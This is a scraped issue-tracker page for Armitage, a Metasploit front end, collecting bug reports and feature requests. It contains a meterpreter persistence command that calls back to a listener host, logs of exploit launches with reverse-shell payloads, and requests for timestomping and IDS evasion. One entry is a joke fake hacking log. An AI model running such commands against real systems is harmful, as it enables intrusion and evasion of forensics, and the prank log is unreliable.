ccgreen13 / armitage Goto Github PK

Play a "Hacked" voice when a post is compromized

Using MSF, one can collect Firefox, IE, Pidgin (etc) stored credential and 
history files. Why not having this in Armitage? 

Armitage uses a module launcher dialog for exploits, payloads, and auxiliary 
modules. Some of the entries in the key/value table have a tooltip that states 
which values are allowed.

In these cases, Armitage should extract these values and place them into a 
combobox when the user is editing that key. This way the user can just select 
which value is valid (instead of having to guess or fat-finger from the 
tooltip).

These fields end with: (accepted: [values]) 

I believe these comma separated values can be parsed out and used to make the 
UX a little better.

What steps will reproduce the problem?
1. Get a meterpreter session
2. try and upload a file with spaces using armitage's upload button
3.

What is the expected output? What do you see instead?
the expected output should be that the file gets uploaded.

here is what you see:
meterpreter> upload /root/Fix Virus.bat Fix Virus.bat
[-] Error running command upload: Errno::ENOENT No such file or directory - 
/root/Fix


What version of Metasploit are you using (type: svn info)? On which
operating system?
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11164
Node Kind: directory
Schedule: normal
Last Changed Author: darkoperator
Last Changed Rev: 11164
Last Changed Date: 2010-11-29 08:08:29 -0600 (Mon, 29 Nov 2010)

BT4 R2

Which database are you using?
msf3



Please provide any additional information below.
you can possibly solve this issue by putting quotes around the upload file.
Also as a feature request, could you provide a gui button for downloading a 
file off of an exploited box using meterpreter as the payload.

What steps will reproduce the problem?
1 starting msfrpcd
2.starting configured mysql-server
3.trying to connect

What is the expected output? What do you see instead?
[*]Using database driver mysql
___
Unable to connect to database.
Make sure its running.
___
[-]Error while running command db_connect: Failed to connect to the 
database:uninitialized constant MysqlCompat::MysqlRes

Call Stack:
[...]

What version of Metasploit are you using (type: svn info)? On which
operating system?
Linux Mint 10(>>Ubuntu 10.10); metasploit version 3.5


Which database are you using?
mysql


Please provide any additional information below.
read that there is an  issue with ruby gems..

This needs to be verified. A quick look at the code leads me to believe it may 
not work.

What steps will reproduce the problem?

On Backtrack 4.2
./msfrpcd -f -U msf -P test -t Basic
/etc/init.d/mysql start
cd /opt/armitage
java -jar armitage.jar

What is the expected output? What do you see instead?
Cannot start the connection:
Error reading response.  (java)

I think XMLRPC is working correctly as this is the output:
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...




What version of Metasploit are you using (type: svn info)? On which
operating system?



Which database are you using?




Please provide any additional information below.

What steps will reproduce the problem?
1. installed Framework 3.6 incl. Armitage on MacOSX10.6.6., all installed 
without problems
2. when run, Armitage will work for a little while and then the database will 
produce: "FATAL:  connection limit exceeded for non-superusers"
3. increased limit to 26 (max) but still not enough
4. after db error, Armitage does not work properly as exploits are skipped and 
sessions not established

What is the expected output? What do you see instead?

"FATAL:  connection limit exceeded for non-superusers" on PostgreSQL console

What version of Metasploit are you using (type: svn info)? On which
operating system?

Framework 3.6 on MacOSX 10.6.6.

Which database are you using?

PostgreSQL 8.4.7


Please provide any additional information below.

Some modules are just displayed in Java but not in Armitage:

Warning: 10.10.1.166 -> windows/smb/ms05_039_pnp -> %(LHOST => '10.10.1.116', 
RPORT => 445, LPORT => 26707, RHOST => '10.10.1.166', PAYLOAD => 
'windows/meterpreter/bind_tcp', TARGET => '7', SMBPIPE => 'browser') at 
attacks.sl:380
Warning: 10.10.1.166 -> windows/smb/ms10_061_spoolss -> %(LHOST => 
'10.10.1.116', RPORT => 445, LPORT => 23237, RHOST => '10.10.1.166', PAYLOAD => 
'windows/meterpreter/reverse_tcp', TARGET => '0', SMBPIPE => 'spoolss') at 
attacks.sl:380
Warning: 10.10.1.203 -> windows/dcerpc/ms03_026_dcom -> %(LHOST => 
'10.10.1.116', RPORT => 135, LPORT => 31425, RHOST => '10.10.1.203', PAYLOAD => 
'windows/meterpreter/reverse_tcp', TARGET => '0') at attacks.sl:380
Warning: 10.10.1.166 -> windows/dcerpc/ms05_017_msmq -> %(LHOST => 
'10.10.1.116', RPORT => 2103, LPORT => 25287, RHOST => '10.10.1.166', PAYLOAD 
=> 'windows/meterpreter/reverse_tcp', TARGET => '0') at attacks.sl:380
Warning: 10.10.1.166 -> windows/dcerpc/ms07_029_msdns_zonename -> %(LHOST => 
'10.10.1.116', RPORT => 0, LPORT => 5015, RHOST => '10.10.1.166', PAYLOAD => 
'windows/meterpreter/reverse_tcp', TARGET => '6', Locale => 'English') at 
attacks.sl:380

Armitage has the ability to read the stdout ramblings of msfrpcd when launched 
from Armitage (via the Start MSF button). It would be helpful to have the 
msfrpcd output available within Armitage.

If msfrpcd was started via Armitage, add an "MSF-RPC Console" item to the View 
menu.

This item would open up a tab in Armitage where messages printed to stdout are 
collected and displayed. 

I'd use this to see the progress of my nmap scans.

What steps will reproduce the problem?
1. when scanning for host
2. when finding attacks
3. anything that involves use of the program after opening it.

What is the expected output? What do you see instead?

"Something went wrong:
Tried: @(msf.RpcConnection@1f7cdc7, 'console.destory', '0')


Error:
java.lan.RuntimeExectpion: Error reading response.

and

"Something went wrong:
Tried: @(msf.RpcConnection@1f7cdc7, 'db.status')


Error:
java.lan.RuntimeExectpion: Error reading response. 

What version of Metasploit are you using (type: svn info)? On which
operating system?

metasploit v3.5.1-release
Backtrack R2
java version "1.6.0_23"

Which database are you using?




Please provide any additional information below.

Receive "Warning:Uncaught exception: java.awt.HeadlessException:No X11 Display 
variable was set, but this program performed an operation which requires it. at 
gui.sl:217" when I run Armitage in BT4R2 using either Postgresql or Mysql. 

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
add a sort function for the targets , like sort out the once that have open 
ports etc


2. Because this feature doesn't exist I have to...
check every target manualy


3. If you add this feature I will...
kiss your ass xD

This error happen to me 5 times today, but its a bit erratic  

What steps will reproduce the problem?
1.nmap one host 
2.search atacks by port
3. nmap another host
4. search attacks by port all TCP 
5. go to step 3 two or tree times mores until it breaks.

What is the expected output? What do you see instead?
expected: usual behaviour.
instead: all previous hosts disappear , and then appear again for a couple of 
seconds , and disappear again. and starts looping with this.

On command line with msfrcpd and artimage launched on background I see as 
follows:

Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.21 (Red Hat Enterprise Linux 3)
Network Distance: 2 hops
Service Info: OS: Linux

TRACEROUTE (using port 1025/tcp)
HOP RTT     ADDRESS
1   0.42 ms xx.xx.xx.xx
2   0.34 ms xx.xx.xx.xx

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at 
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.21 seconds
           Raw packets sent: 1032 (46.098KB) | Rcvd: 1027 (41.666KB)
Thread id: db.services -> {services=[Ljava.lang.Object;@1e91259}
java.lang.RuntimeException: Error reading response.
    at msf.RpcConnection.readResp(RpcConnection.java:137)
    at msf.RpcConnection.exec(RpcConnection.java:66)
    at msf.RpcConnection.cacheExecute(RpcConnection.java:261)
    at msf.RpcConnection.execute(RpcConnection.java:239)
    at armitage.ArmitageTimer.readFromClient(ArmitageTimer.java:29)
    at armitage.ArmitageTimer.run(ArmitageTimer.java:37)
    at java.lang.Thread.run(Unknown Source)
Warning: Attempted to use foreach on non-array: '' at targets.sl:126
Warning: invalid use of index operator: 'success'['target_host'] at 
targets.sl:46
Thread id: db.hosts -> null
java.lang.RuntimeException: Error reading response.
    at msf.RpcConnection.readResp(RpcConnection.java:137)
    at msf.RpcConnection.exec(RpcConnection.java:66)
    at msf.RpcConnection.cacheExecute(RpcConnection.java:261)
    at msf.RpcConnection.execute(RpcConnection.java:239)
    at armitage.ArmitageTimer.readFromClient(ArmitageTimer.java:29)
    at armitage.ArmitageTimer.run(ArmitageTimer.java:37)
    at java.lang.Thread.run(Unknown Source)
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at 
targets.sl:46
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at 
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at 
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at 
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
....
this goes on until I break it.


What version of Metasploit are you using (type: svn info)? On which
operating system?

armitage, metasploit and java version

marc.riera@wl183072:~/Code/armitage/armitage$ svn info 
Path: .
URL: http://armitage.googlecode.com/svn/trunk/release/armitage-unix
Repository Root: http://armitage.googlecode.com/svn
Repository UUID: 957f4724-0442-2941-0443-fd1ab383608d
Revision: 55
Node Kind: directory
Schedule: normal
Last Changed Author: rsmudge
Last Changed Rev: 55
Last Changed Date: 2010-12-13 04:43:31 +0100 (Mon, 13 Dec 2010)

marc.riera@wl183072:~/Code/armitage/armitage$ cd ../msf/msf3/
marc.riera@wl183072:~/Code/armitage/msf/msf3$ svn info .
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11341
Node Kind: directory
Schedule: normal
Last Changed Author: darkoperator
Last Changed Rev: 11339
Last Changed Date: 2010-12-15 02:24:27 +0100 (Wed, 15 Dec 2010)

marc.riera@wl183072:~/Code/armitage/msf/msf3$ java -version
java version "1.6.0_23"
Java(TM) SE Runtime Environment (build 1.6.0_23-b05)
Java HotSpot(TM) Server VM (build 19.0-b09, mixed mode)
marc.riera@wl183072:~/Code/armitage/msf/msf3$ 




Which database are you using?

libdbd-mysql-ruby                    0.4.4-1 
mysql-server                         5.1.49-1ubuntu8.1


Please provide any additional information below.

marc.riera@wl183072:~/Code/armitage/msf/msf3$ dpkg -l|grep -Ei 'mysql|ruby'
ii  libbreakpoint-ruby1.8                0.5.1-2                                
             Ruby library for adding breakpoints to Ruby 1.8 programs
ii  libcmdparse2-ruby1.8                 2.0.2-2                                
             Advanced command line parsing module supporting sub-commands
ii  libdaemons-ruby1.8                   1.0.10-2                               
             Ruby daemons library
ii  libdataobjects-mysql-ruby            0.10.2-1                               
             MySQL adapter for libdataobjects-ruby1.8
ii  libdataobjects-mysql-ruby1.8         0.10.2-1                               
             MySQL adapter for libdataobjects-ruby1.8
ii  libdataobjects-postgres-ruby1.8      0.10.2-1                               
             Postgres adapter for libdataobjects-ruby1.8
ii  libdataobjects-ruby1.8               0.10.2-1                               
             Rewrite Ruby database drivers to conform to a single interface
ii  libdataobjects-sqlite3-ruby1.8       0.10.1.1-1                             
             sqlite3 adapter for libdataobjects-ruby1.8
ii  libdbd-mysql-perl                    4.016-1                                
             Perl5 database interface to the MySQL database
ii  libdbd-mysql-ruby                    0.4.4-1                                
             Ruby/DBI MySQL driver
ii  libdbd-mysql-ruby1.8                 0.4.4-1                                
             Ruby/DBI MySQL driver for Ruby 1.8
ii  libdbi-ruby1.8                       0.4.3-2                                
             Database Independent Interface for Ruby 1.8
ii  libdeprecated-ruby1.8                2.0.1-2                                
             Library for handling deprecated code in Ruby 1.8
ii  liblog4r-ruby1.8                     1.0.5-8                                
             A logging library for Ruby
ii  libmmap-ruby1.8                      0.2.6-3                                
             Ruby interface to manage memory-mapped file objects
ii  libmysql-ruby                        2.8.2-1                                
             MySQL module for Ruby
ii  libmysql-ruby1.8                     2.8.2-1                                
             MySQL module for Ruby 1.8
ii  libmysqlclient16                     5.1.49-1ubuntu8.1                      
             MySQL database client library
ii  libncurses-ruby1.8                   1.2.4-2                                
             ruby Extension for the ncurses C library
ii  libqt4-sql-mysql                     4:4.7.0-0ubuntu4.2                     
             Qt 4 MySQL database driver
ii  libruby-extras                       0.5                                    
             a bundle of additional libraries for Ruby
ii  libruby1.8                           1.8.7.299-2                            
             Libraries necessary to run Ruby 1.8
ii  libruby1.8-extras                    0.5                                    
             a bundle of additional libraries for Ruby 1.8
ii  mysql-admin                          5.0r14+openSUSE-2.1                    
             GUI tool for intuitive MySQL administration
ii  mysql-client-5.1                     5.1.49-1ubuntu8.1                      
             MySQL database client binaries
ii  mysql-client-core-5.1                5.1.49-1ubuntu8.1                      
             MySQL database core client binaries
ii  mysql-common                         5.1.49-1ubuntu8.1                      
             MySQL database common files, e.g. /etc/mysql/my.cnf
ii  mysql-gui-tools-common               5.0r14+openSUSE-2.1                    
             Architecture independent files for MySQL GUI Tools
ii  mysql-query-browser                  5.0r14+openSUSE-2.1                    
             Official GUI tool to query MySQL database
ii  mysql-server                         5.1.49-1ubuntu8.1                      
             MySQL database server (metapackage depending on the latest version)
ii  mysql-server-5.1                     5.1.49-1ubuntu8.1                      
             MySQL database server binaries and system database setup
ii  mysql-server-core-5.1                5.1.49-1ubuntu8.1                      
             MySQL database server binaries
ii  ruby                                 4.5                                    
             An interpreter of object-oriented scripting language Ruby
ii  ruby1.8                              1.8.7.299-2                            
             Interpreter of object-oriented scripting language Ruby 1.8
ii  rubygems                             1.3.7-2                                
             package management framework for Ruby libraries/applications
ii  rubygems1.8                          1.3.7-2                                
             package management framework for Ruby libraries/applications
marc.riera@wl183072:~/Code/armitage/msf/msf3$ 

What steps will reproduce the problem?
1. Armitage with a very very slow performance on a non VM box
2. Mouse right clicks takes forever for example to use the stack function
3. Host menu functions take forever to transmit the gui example MFS scans popup 
requiring network segmentation input take a long time to appear.

What is the expected output? What do you see instead?
This happened in ubuntu meerkat 10.10 Linux ptcasnxpt1079 2.6.35-25-generic 
#44-Ubuntu SMP Fri Jan 21 17:40:44 UTC 2011 x86_64 GNU/Linux
and on a sandbox environment also after performing the msfupdate. After the 
update things got complicated as within the VM BT4Rc2 and within Meerkat Ubuntu.


What version of Metasploit are you using (type: svn info)? On which
operating system?
version  =[ metasploit v3.7.0-dev [core:3.7 api:1.0] +[ svn r12214 updated 
today (2011.04.01)


Which database are you using?
Postgresql



Please provide any additional information below.

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...

Some sort of directory/log parsing capability for the persistence script. (I'm 
there is a better way to achieve persistence other then the persistence script, 
but thats is how I've been doing it). 

Currently a remove file gets added to a directory which stores the remove 
script for the persistence script on the remote host. An graphical list that 
grabs the files out of the directory and lists them would allow the user to 
click the list item and/or a button to run the remove script.


2. Because this feature doesn't exist I have to...

Go to the directory that stores these remove scripts and run them.

For example, after running:

'meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.10'

...I will have a file in:

'/root/.msf3/logs/scripts/persistence/NICKSXP_20110105.3830/NICKSXP_20110105.383
0.rc'

...which I can run using:

'run multi_console_command -rc 
/root/.msf3/logs/scripts/persistence/NICKSXP_20110105.3830/NICKSXP_20110105.3830
.rc'

...to remove the script so I don't leave unauthenticated backdoors around.

3. If you add this feature I will...

promise to look into better ways of doing stealth and persistence ;)

Armitage is now distributed with the Metasploit Framework. Eventually, when 
they respin the distro, a new script to start it will be included. This script 
will make sure "start msfrpcd" works and Armitage automatically knows the 
postgresql parameters. This script already exists.

This ticket is here to remind me to respin the Armitage Windows distro to 
include these scripts and provide install instructions pointing users to unzip 
Armitage over their Metasploit directory. By doing this they can just have 
everything work beautifully.

What steps will reproduce the problem?
1. Download Linux Version
2. Attempt to run Armitage
3.

What is the expected output? What do you see instead?
Expected program to open. instead, recieve this error. 
root@example-laptop:~/# ./armitage.sh
*** File: scripts/attacks.sl
Error: Class TableRowSorter was not found at line 192
       TableRowSorter



What version of Metasploit are you using (type: svn info)? On which
operating system?

Latest version of MSF, 


Which database are you using?

PostgreSQL


Please provide any additional information below.

Add "start sniffing" option for compromised hosts

The multi/* seem to be the hardest to get right. The others should be 
selectable based on their full name (e.g., osx/browser/whatever - use a generic 
reverse shell payload or some such thing).

Also give the user the option of setting the "target" of the client-side attack.

What steps will reproduce the problem?
1. Exploited target with payload=windows/meterpreter/reverse_tcp
2. Loaded Exploit multi/handler with Reverse Connection
3. Meterpreter session starts on Armitage console
4. At Meterpreter> prompt, no commands work, and there are no options other 
than "Meterpreter Shell" under Attack when right-clicking the target which is 
red with lightning bolts

What is the expected output? What do you see instead?
All commands return nothing.  No additional errors are generated.


What version of Metasploit are you using (type: svn info)? On which
operating system?
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11889
Node Kind: directory
Schedule: normal
Last Changed Author: hdm
Last Changed Rev: 11889
Last Changed Date: 2011-03-06 20:46:51 -0600 (Sun, 06 Mar 2011)
Running on Backtrack 4R2


Which database are you using?
MySQL



Please provide any additional information below.
Functions perfectly when I create the same multi/handler with msfconsole.

What steps will reproduce the problem?
1.
2.
3. when clik on connect ...

What is the expected output? What do you see instead?

[-]Invalid driver specified


What version of Metasploit are you using (type: svn info)? On which
operating system?

root@bt:/pentest/exploits/framework3# svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 10845
Node Kind: directory
Schedule: normal
Last Changed Author: hdm
Last Changed Rev: 10844
Last Changed Date: 2010-10-29 06:14:22 +0200 (Fri, 29 Oct 2010)


... on BackTrack 4 R2



Which database are you using?

Mysql embedded on BT4 R2




Please provide any additional information below.

from techbytom.com, @thomas_ervin on twitter.

I've got some cool idea that may help reduce IDS detection for scans ;)  I'm 
working on that privately first but depending on how it goes I'd love to 
incorporate that into Armitage as well.  I'm guessing I'd need to export a list 
of IPs?  Could you specify a format so I can make sure to have it ready to plug 
and play?

Two possible ways this could work with Armitage:
 - File -> Import targets style (ok, and more compatible for other users)
 - As a new discovery method baked into Armitage

What steps will reproduce the problem?
U start up the mysql ana everything else but wen u try to connect to an 
instance it gives the below error message. Kinda connected to the mysql.com hack

What is the expected output? What do you see instead?


Factoring..........[*] Scanning RSA tokens for usable seed.....[*] Logging into
vault.rsa.com as 'rivest'......[*] Launching SQL injection attack against MySQL.
com....[*] Extracting passwords hashes....[*] Replaying SHA1 hashes against 
Sun.                                                                            
           com.......[*] Attaching to Stuxnet through Oracle Command 
Center....!#$#$@#$$puT                                                          
                             T

Y!
@$


@vault
.rsa.com


 # #@pu

TTY#$@#..@#$@34 msf>.. ui

d=0(root) gid=0(root) g


roups=0(root) @#$@#42 3m

sf>bash-4.1#

What version of Metasploit are you using (type: svn info)? On which
operating system?

msf3 on bt4 r2

Which database are you using?


mysql

Please provide any additional information below.

Hi im telling that windows vista have a problem,the say me the vulnerabilities 
but don´t start the exploit. The bottom from atack don´t work

I'd like you to add OpenVas/NeXpose/Nessus/Amap scan options in "Hosts" (like 
"Nmap Scan" in "Hosts")

I believe Armitage is about ease of use, so why not integrating other useful 
discovery tools in it? Such tools make the exploitation process more accurate 
and fast.

What steps will reproduce the problem?
1.Can not run the framework postgresql service on windows 7
2.
3.

What is the expected output? What do you see instead?

when i start armitage on windows 7 click to start MSF appear a message "using 
db driver postgresql" ok "unable to connect to db make sure it running'.Go to 
services frameworkpostgresql click right > properties > start ,message "the 
operation could not be completed.the system cannot find the path specified

What version of Metasploit are you using (type: svn info)? On which
operating system? metasploit 3.6.0



Which database are you using?

postgreSQL


Please provide any additional information below.

1. Get a raw list of exploits: db_autopwn -T -R [min rank] [-p|-x]
2. Filter list by OS information
3. Sort list by rank
4. Use bind listeners where possible, if I can connect to throw the exploit, I 
can connect to get my shell/meterpreter session
5. Execute by firing one or two off every 0.5 seconds or so (show a progress 
bar)

Advantages:

- Avoids unnecessary exploits (db_autopwn ignores OS information). Armitage is 
pretty smart about including multi/* exploits in its acceptable pool, so no 
valid exploit option will be missed.
- Sorting will make sure a service is hit with the better exploit before a 
weaker one can hit it.
- Use of a progress dialog will make it possible for users to cancel the 
operation too. 

Question: will ms08_067 fire off before other smb exploits in this scheme?

The title explains it. Also, verify that .NET server and Windows 2008 both get 
the right icon.

meterpreter> sysinfo
Computer: WIN-I4LVV3P01RG
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US

------------------

rpreter> sysinfo
Computer: ACME-14E429D2B5
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US

--------------------

meterpreter> sysinfo
Computer: ACME-TSOVK3HCPS
OS      : Windows 2000 (Build 2195, ).
Arch    : x86
Language: en_US

--------------------

meterpreter> sysinfo
Computer: HACKER-8B148A5F
OS      : Windows .NET Server (Build 3790, Service Pack 2).
Arch    : x86
Language: en_US

What steps will reproduce the problem?
1.launch host scan "nmap all tcp ports"
2.using 4Gb ram with 32bits kernel pae
3.on the msf command line the error will rise when the RAM is eaten.

What is the expected output? What do you see instead?
The expected behavior is not to exit and finish the job instead. Using swap as 
usual. 



What version of Metasploit are you using (type: svn info)? On which
operating system?
here it goes armitage svn info and metasploit svn info, the last line is linux 
kernel info.
marc.riera@wl183072:~/Code/armitage/armitage$ svn info
Path: .
URL: http://armitage.googlecode.com/svn/trunk/release/armitage-unix
Repository Root: http://armitage.googlecode.com/svn
Repository UUID: 957f4724-0442-2941-0443-fd1ab383608d
Revision: 55
Node Kind: directory
Schedule: normal
Last Changed Author: rsmudge
Last Changed Rev: 55
Last Changed Date: 2010-12-13 04:43:31 +0100 (Mon, 13 Dec 2010)

marc.riera@wl183072:~/Code/armitage/armitage$ cd ../msf/msf3/
marc.riera@wl183072:~/Code/armitage/msf/msf3$ svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11330
Node Kind: directory
Schedule: normal
Last Changed Author: egypt
Last Changed Rev: 11330
Last Changed Date: 2010-12-14 18:26:44 +0100 (Tue, 14 Dec 2010)

marc.riera@wl183072:~/Code/armitage/msf/msf3$ uname -a
Linux wl183072 2.6.35-23-generic-pae #41-Ubuntu SMP Wed Nov 24 10:35:46 UTC 
2010 i686 GNU/Linux
marc.riera@wl183072:~/Code/armitage/msf/msf3$ 


Which database are you using?

mysql server 5.1


Please provide any additional information below.
this app is doing a great job to help me check and tune our company security. 
thanks.

What steps will reproduce the problem?
1. Install armitage (as shown in tutorial) in Windows 7.
2. Run msfconsole first.
3. Run armitage.bat

What is the expected output? What do you see instead?
After clicking "Start MSF", nothing comes on.


What version of Metasploit are you using (type: svn info)? On which
operating system?
Metasploit Rev 11705
OS - Windows 7

Which database are you using?
Postgresql


Please provide any additional information below.
On running "java -jar armitage.jar" (with PATH and JAVA_HOME set correctly):

Exception in thread "Thread-4" java.lang.reflect.UndeclaredThrowableException
        at $Proxy1.run(Unknown Source)
        at java.lang.Thread.run(Thread.java:662)
Caused by: java.io.FileNotFoundException: 
C:\framework\msf3\data\armitage\E:\.armitage.prop (The filename, directory 
name, or volume label syntax is incorrect)
        at java.io.FileOutputStream.open(Native Method)
        at java.io.FileOutputStream.<init>(FileOutputStream.java:179)
        at java.io.FileOutputStream.<init>(FileOutputStream.java:70)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:39)
        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:27)
        at java.lang.reflect.Constructor.newInstance(Constructor.java:513)
        at sleep.engine.atoms.ObjectNew$ConstructorCallRequest.execute(Unknown Source)
        at sleep.engine.CallRequest.CallFunction(Unknown Source)
        at sleep.engine.atoms.ObjectNew.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.bridges.SleepClosure.evaluate(Unknown Source)
        at sleep.engine.CallRequest$FunctionCallRequest.execute(Unknown Source)
        at sleep.engine.CallRequest.CallFunction(Unknown Source)
        at sleep.engine.atoms.Call.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.engine.atoms.Decide.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.engine.Block.evaluate(Unknown Source)
        at sleep.bridges.SleepClosure.evaluate(Unknown Source)
        at sleep.engine.ProxyInterface.invoke(Unknown Source)
        ... 2 more

What steps will reproduce the problem?
1. When use CSA like windows/browser/ms10_018_ie_behaviors.
2. Meterpreter load a random port to listen.
3. No conection for the victim becuse the firewall are blocking that port.

What is the expected output? What do you see instead?

The port to listen CSA is random, I want to choose that port.

What version of Metasploit are you using (type: svn info)? On which
operating system?

metasploit v3.6.0-dev [core:3.6 api:1.0]; BT4R2



Which database are you using?

MySQL


Please provide any additional information below.


I need more control to meterpreter options, many thabnks and great job!

What steps will reproduce the problem?
1. run the linux package or compile the source on a Mac 
2. connect to the database (127.0.0.1)
3. see the following errors i/ in the console "[Fatal Error] :1:1: Content is 
not allowed in prolog." and ii/ in the gui: "org.xml.sax.SAXParseException: 
Content is not allowed in prolog"

Version info:
- MacOS X 10.6.5
- java version "1.6.0_22"
- Java(TM) SE Runtime Environment (build 1.6.0_22-b04-307-10M3261)
- Java HotSpot(TM) 64-Bit Server VM (build 17.1-b03-307, mixed mode)

What version of Metasploit are you using (type: svn info)? 
URL: https://www.metasploit.com/svn/framework3/trunk
Repository Root: https://www.metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11200
Node Kind: directory
Schedule: normal
Last Changed Author: jduck
Last Changed Rev: 11198
Last Changed Date: 2010-12-02 03:23:27 +0100 (Thu, 02 Dec 2010)

Which database are you using? MySQL 5.1.44

Timestomping is useful for confusing forensic guys. I think it would be great 
to have this in Armitage's file browser.

The link should take users to this page. Maybe? Bug Reports...  should be the 
title. Or Issue Tracker. Not sure yet.

This is a note to myself. During last night's demo, I changed the color 
settings and everything looked ok. Later I saw that my shells had the default 
color settings and not the settings I created. 

What steps will reproduce the problem?

Try to launch armitage via the executable on Windows 64-bit

What is the expected output? What do you see instead?

See screenshot.

Workaround: Use armitage-debug.bat to launch Armitage.

What steps will reproduce the problem?
1. Start Armitage with the MySQL database on Backtrack R42
2. Go to Hosts -> MSF Scans and enter the local subnet

What is the expected output? What do you see instead?

The Armitage UI lags terribly. It should be snappier. When PostgreSQL is 
running this problem isn't evident. 

What version of Metasploit are you using (type: svn info)? On which
operating system?

root@bt:/pentest/exploits/framework3# svn info .
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11159
Node Kind: directory
Schedule: normal
Last Changed Author: scriptjunkie
Last Changed Rev: 11153
Last Changed Date: 2010-11-25 10:48:05 -0500 (Thu, 25 Nov 2010)


Which database are you using?

msf > db_status
[*] mysql connected to msf32

Please provide any additional information below.

Reducing the threads/module from 24 to 8 seems to fix this. As a work-around, 
users should use the PostgreSQL database instead.

Once complete--respond to 
http://twitter.com/#!/guerilla7/status/22909285176442880 with remediation or 
shoulder shrug. 

What steps will reproduce the problem?
1.Use Armitage on Windows
2.Run a Psexec with credentials (valid)
3.It shows as a job, but the host doesnt turn red

What is the expected output? What do you see instead?
Nothing, just a Job session


What version of Metasploit are you using (type: svn info)? On which
operating system?
Latest one as for November 30 2010



Which database are you using?
Postgres



Please provide any additional information below.

The Armitage YAML parser rejects fields that have single quote characters in 
them. This should be resolved in the next update.

Hello,

May be the problem is in me... now lets try to talk in pictures becouse my 
english is not so good to explain you what happens. Im trying already for 2 
days.....
First i had other problem with mysqld.sock in var/usr/mysqld  ... i've one day 
qith this on a brand new bt4 r2 instalation :
ERROR 2002 (HY000): Can't connect to local MySQL server through socket 
'/var/run/mysqld/mysqld.sock' (2)
But this is not your problem... :) Now mysql is running fine. 
I very  new in this thing so i assume that the problem may be in me... or may 
be you missed something important in the MANUAL....
And why always asks for port 5432 in mysql... whathever i tryed also with this 
port and nothing. 
Ok im attaching the snapshots and i hope that you'll find the problem.... i so 
impatient to run this ot the 2 systems... BT4 r2 and WIN7 32 bit.

Greetings mate... 

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
a cleanup option somewhere (once persistance is run)


2. Because this feature doesn't exist I have to...
manually look for the cleanup script and execute it.


3. If you add this feature It will...
be easier to manage persistant meterpreter sessions.

 Armitage knows what OS it's dealing with when there's a shell open. This could be put to good use. I'd like to see popup menus in the command shell portion with, here are some ideas:

*NIX:
Upload file...  # uses echo to upload a file

Windows:
... do various popular command line things ...

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...

More advanced tab closure, such as close all but this, close all, close all to 
the right, etc.

2. Because this feature doesn't exist I have to...

Manually close each tab.

3. If you add this feature I will...

Be able to save a lot of time.

What steps will reproduce the problem?
1. /etc/init.d/mysql start
2. msfrpcd -f -U msf -P test -t Basic
3. /opt/armitage/armatige.sh

4. Enter info and click "Connect"

What is the expected output? What do you see instead?

A message box opens with the error "[-] Invalid driver specified" Armitage then 
seems to try to connect to postgresql and of course fails.

What version of Metasploit are you using (type: svn info)? On which
operating system?

$ svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
